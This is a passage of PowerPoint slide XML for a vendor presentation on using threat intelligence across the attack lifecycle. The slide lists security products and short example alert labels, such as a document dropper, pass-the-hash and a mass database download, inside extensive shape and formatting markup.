                      <a:pt x="8" y="20"/>
                      <a:pt x="8" y="20"/>
                      <a:pt x="8" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="39"/>
                      <a:pt x="35" y="52"/>
                      <a:pt x="56" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="52"/>
                      <a:pt x="108" y="29"/>
                      <a:pt x="108" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="0"/>
                      <a:pt x="100" y="0"/>
                      <a:pt x="100" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="24"/>
                      <a:pt x="80"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2" name="Group 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="274637" y="2035422"/>
            <a:ext cx="11884388" cy="742712"/>
            <a:chOff x="274637" y="2035422"/>
            <a:chExt cx="11884388" cy="742712"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="117" name="Rectangle 116"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="274637" y="2035422"/>
              <a:ext cx="11884388" cy="74271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38" name="Group 137"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1746847" y="2335208"/>
              <a:ext cx="138912" cy="138912"/>
              <a:chOff x="7596188" y="1044575"/>
              <a:chExt cx="909637" cy="909638"/>
            </a:xfrm>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="139" name="Freeform 5"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7820025" y="1271588"/>
                <a:ext cx="457200" cy="45085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rgbClr val="282828"/>
              </a:solidFill>
              <a:ln w="3175">
                <a:solidFill>
                  <a:srgbClr val="282828"/>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140" name="Freeform 6"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7596188" y="1044575"/>
                <a:ext cx="909637" cy="90963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tx1"/>
              </a:solid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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="143" name="Group 142"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3442541" y="2338065"/>
              <a:ext cx="133198" cy="133198"/>
              <a:chOff x="7596188" y="1044575"/>
              <a:chExt cx="909637" cy="909638"/>
            </a:xfrm>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="144" name="Freeform 5"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7820025" y="1271588"/>
                <a:ext cx="457200" cy="45085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tx1"/>
              </a:solid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145" name="Freeform 6"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7596188" y="1044575"/>
                <a:ext cx="909637" cy="90963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tx1"/>
              </a:solid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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="148" name="Group 147"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5122281" y="2336639"/>
              <a:ext cx="136051" cy="136051"/>
              <a:chOff x="7596188" y="1044575"/>
              <a:chExt cx="909637" cy="909638"/>
            </a:xfrm>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="149" name="Freeform 5"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7820025" y="1271588"/>
                <a:ext cx="457200" cy="45085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150" name="Freeform 6"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7596188" y="1044575"/>
                <a:ext cx="909637" cy="90963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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="153" name="Group 152"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6811871" y="2336639"/>
              <a:ext cx="136051" cy="136051"/>
              <a:chOff x="7596188" y="1044575"/>
              <a:chExt cx="909637" cy="909638"/>
            </a:xfrm>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="154" name="Freeform 5"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7820025" y="1271588"/>
                <a:ext cx="457200" cy="45085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155" name="Freeform 6"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7596188" y="1044575"/>
                <a:ext cx="909637" cy="90963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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="158" name="Group 157"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8502078" y="2336639"/>
              <a:ext cx="136051" cy="136051"/>
              <a:chOff x="7596188" y="1044575"/>
              <a:chExt cx="909637" cy="909638"/>
            </a:xfrm>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="159" name="Freeform 5"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7820025" y="1271588"/>
                <a:ext cx="457200" cy="45085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160" name="Freeform 6"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7596188" y="1044575"/>
                <a:ext cx="909637" cy="90963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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="163" name="Group 162"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="10192891" y="2336639"/>
              <a:ext cx="136051" cy="136051"/>
              <a:chOff x="7596188" y="1044575"/>
              <a:chExt cx="909637" cy="909638"/>
            </a:xfrm>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="164" name="Freeform 5"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7820025" y="1271588"/>
                <a:ext cx="457200" cy="45085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165" name="Freeform 6"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7596188" y="1044575"/>
                <a:ext cx="909637" cy="90963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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="169" name="Group 168"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="11867352" y="2336639"/>
              <a:ext cx="136051" cy="136051"/>
              <a:chOff x="7596188" y="1044575"/>
              <a:chExt cx="909637" cy="909638"/>
            </a:xfrm>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="170" name="Freeform 5"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7820025" y="1271588"/>
                <a:ext cx="457200" cy="45085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171" name="Freeform 6"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7596188" y="1044575"/>
                <a:ext cx="909637" cy="909638"/>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grpFill/>
              <a:ln w="317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grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="216" name="Rectangle 215"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="424448" y="2108514"/>
              <a:ext cx="1603290" cy="603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t>Offerings</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="217" name="Rectangle 216"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2108807" y="2108514"/>
              <a:ext cx="1603287" cy="603504"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="B2D4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6400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t>INTERFLOW  &amp; THREAT ATTRIBUTION SERVICE</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="218" name="Rectangle 217"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3793163" y="2108514"/>
              <a:ext cx="1603287" cy="603504"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="7FB8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O365 ATP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="219" name="Rectangle 218"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5477519" y="2108517"/>
              <a:ext cx="1603287" cy="603504"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="4095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WINDOWS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DEFENDER ATP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="220" name="Rectangle 219"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7161875" y="2108517"/>
              <a:ext cx="1603287" cy="603504"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="4095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WINDOWS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DEFENDER ATP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="221" name="Rectangle 220"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8846231" y="2108517"/>
              <a:ext cx="1603287" cy="6035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MICROSOFT ATA</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="222" name="Rectangle 221"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10530584" y="2108517"/>
              <a:ext cx="1603287" cy="6035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AZURE SECURITY CENTER</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116" name="Title 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274639" y="295274"/>
            <a:ext cx="11889564" cy="120507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0" cap="none" spc="-40" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="70796">
                      <a:schemeClr val="bg1"/>
                    </a:gs>
                    <a:gs pos="22000">
                      <a:schemeClr val="bg1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="1"/>
                </a:gradFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Leveraging Threat Intel</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0" cap="none" spc="-40" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="70796">
                      <a:schemeClr val="bg1"/>
                    </a:gs>
                    <a:gs pos="22000">
                      <a:schemeClr val="bg1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="1"/>
                </a:gradFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Spanning the Attack Lifecycle</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="277450" y="2738922"/>
            <a:ext cx="11941674" cy="3958741"/>
            <a:chOff x="277450" y="2738922"/>
            <a:chExt cx="11941674" cy="3958741"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="173" name="Rectangle 172"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="277450" y="2778133"/>
              <a:ext cx="11884388" cy="32317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4" name="Rectangle 173"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="424448" y="3559725"/>
              <a:ext cx="1603290" cy="2319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91440" rIns="80058" bIns="40029"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t>Detections submitted from multiple sensors</a:t>
              </a:r>
              <a:endPar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endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="175" name="Rectangle 174"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2108807" y="3559725"/>
              <a:ext cx="1603287" cy="2319166"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="B2D4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91440" rIns="80058" bIns="40029"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t>Threat Intelligence feeds and correlation data</a:t>
              </a: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endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="176" name="Rectangle 175"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3793163" y="3559725"/>
              <a:ext cx="1603287" cy="2319166"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="7FB8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91440" rIns="80058" bIns="40029" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="t" anchorCtr="0" forceAA="0" compatLnSpc="1">
              <a:prstTxWarp prst="textNoShape">
                <a:avLst/>
              </a:prstTxWarp>
              <a:noAutofit/>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Mail received by</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" marR="0" lvl="0" indent="-174862"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M. Smith (Sales)</a:t>
              </a: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Detection</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="171450" marR="0" lvl="0" indent="-171450"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Agenda.doc (Win32/</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="70796">
                        <a:schemeClr val="bg1"/>
                      </a:gs>
                      <a:gs pos="22000">
                        <a:schemeClr val="bg1"/>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="1"/>
                  </a:gradFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>NeroBlaze</a:t>
              </a:r>
              <a:b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b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Dropper)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="177" name="Rectangle 176"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5477519" y="3559728"/>
              <a:ext cx="1603287" cy="2319166"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="4095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91440" rIns="80058" bIns="40029" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="t" anchorCtr="0" forceAA="0" compatLnSpc="1">
              <a:prstTxWarp prst="textNoShape">
                <a:avLst/>
              </a:prstTxWarp>
              <a:noAutofit/>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IOA Detection</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="171450" marR="0" lvl="0" indent="-171450"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Browser started suspicious process (Name: inst.dat)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="178" name="Rectangle 177"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7161875" y="3559728"/>
              <a:ext cx="1603287" cy="2319166"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="4095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91440" rIns="80058" bIns="40029" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="t" anchorCtr="0" forceAA="0" compatLnSpc="1">
              <a:prstTxWarp prst="textNoShape">
                <a:avLst/>
              </a:prstTxWarp>
              <a:noAutofit/>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IOA Detection</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="171450" marR="0" lvl="0" indent="-171450"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HOST: MSMITH-MAIL</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" marR="0" lvl="0" indent="-174862"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GoogleUpdate.EXE</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="171450" marR="0" lvl="0" indent="-171450"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Rare Startup Program (Prevalence: 2 local </a:t>
              </a:r>
              <a:b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b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/74 WW)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="174862" marR="0" lvl="0" indent="-174862" defTabSz="95102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50" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="70796">
                      <a:schemeClr val="bg1"/>
                    </a:gs>
                    <a:gs pos="22000">
                      <a:schemeClr val="bg1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="1"/>
                </a:gradFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="179" name="Rectangle 178"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8846231" y="3559728"/>
              <a:ext cx="1603287" cy="23191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91440" rIns="80058" bIns="40029" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="t" anchorCtr="0" forceAA="0" compatLnSpc="1">
              <a:prstTxWarp prst="textNoShape">
                <a:avLst/>
              </a:prstTxWarp>
              <a:noAutofit/>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ATA Detection</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="171450" marR="0" lvl="0" indent="-171450"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HOST: MSMITH-MAIL</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" marR="0" lvl="0" indent="-174862"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PTH Detection</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" marR="0" lvl="0" indent="-174862" defTabSz="91440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ATA Detection</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" marR="0" lvl="0" indent="-174862"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HOST: DC-01</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="171450" marR="0" lvl="0" indent="-171450" defTabSz="91440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Mass Computer Enumeration</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="174862" marR="0" lvl="0" indent="-174862" defTabSz="951028"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Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="186" name="Rectangle 185"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10530584" y="3559728"/>
              <a:ext cx="1603287" cy="23191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91440" rIns="80058" bIns="40029" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="t"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endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="91440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Detection</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="171450" marR="0" lvl="0" indent="-171450"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HOST: AZSQL-01 (Azure SQL instance)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="171450" marR="0" lvl="0" indent="-171450" defTabSz="91440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gradFill>
                    <a:gsLst>
                      <a:gs pos="70796">
                        <a:schemeClr val="bg1"/>
                      </a:gs>
                      <a:gs pos="22000">
                        <a:schemeClr val="bg1"/>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="1"/>
                  </a:gradFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Mass download of database content from an unusual host</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="224" name="Rectangle 223"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="277450" y="6050461"/>
              <a:ext cx="11884388" cy="6472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5" name="Rectangle 224"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="367162" y="6118554"/>
              <a:ext cx="1598822" cy="51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t>+ Content</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="269" name="Group 268"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2051237" y="6118554"/>
              <a:ext cx="10025347" cy="511016"/>
              <a:chOff x="2051238" y="6118554"/>
              <a:chExt cx="9717364" cy="511016"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="BFDCF1"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="226" name="Rectangle 225"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2051238" y="6118554"/>
                <a:ext cx="1888020" cy="511013"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="B2D4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rPr>
                  <a:t>Threat </a:t>
                </a:r>
                <a:b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rPr>
                </a:b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rPr>
                  <a:t>Encyclopedia description</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="227" name="Rectangle 226"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4008574" y="6118554"/>
                <a:ext cx="1888020" cy="511013"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="B2D4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rPr>
                  <a:t>Tactics, Techniques, </a:t>
                </a:r>
                <a:b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rPr>
                </a:b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rPr>
                  <a:t>and Processes (TTPs)</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="228" name="Rectangle 227"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5965910" y="6118557"/>
                <a:ext cx="1888020" cy="511013"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="B2D4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282828"/>
                        </a:gs>
                        <a:gs pos="100000">
                          <a:srgbClr val="282828"/>
                        </a:gs>
                      </a:gsLst>
                      <a:lin ang="5400000" scaled="1"/>
                    </a:gradFill>
                    <a:effectLst/>
                    <a:uLnTx/>
                    <a:uFillTx/>
                    <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>Related threats</a:t>
                </a:r>
                <a:endPar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endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="229" name="Rectangle 228"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7923245" y="6118557"/>
                <a:ext cx="1888020" cy="511013"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="B2D4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rPr>
                  <a:t>Downloaded report</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="230" name="Rectangle 229"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9880582" y="6118557"/>
                <a:ext cx="1888020" cy="511013"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="B2D4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282828"/>
                        </a:gs>
                        <a:gs pos="100000">
                          <a:srgbClr val="282828"/>
                        </a:gs>
                      </a:gsLst>
                      <a:lin ang="5400000" scaled="1"/>
                    </a:gradFill>
                    <a:effectLst/>
                    <a:uLnTx/>
                    <a:uFillTx/>
                    <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>Engage</a:t>
                </a:r>
                <a:br>
                  <a:rPr kumimoji="0" lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:gradFill>
                      <a:gsLst>
                        <a:gs pos="0">
                          <a:srgbClr val="282828"/>
                        </a:gs>
                        <a:gs pos="100000">
                          <a:srgbClr val="282828"/>
                        </a:gs>
                      </a:gsLst>
                      <a:lin ang="5400000" scaled="1"/>
                    </a:gradFill>
                    <a:effectLst/>
                    <a:uLnTx/>
                    <a:uFillTx/>
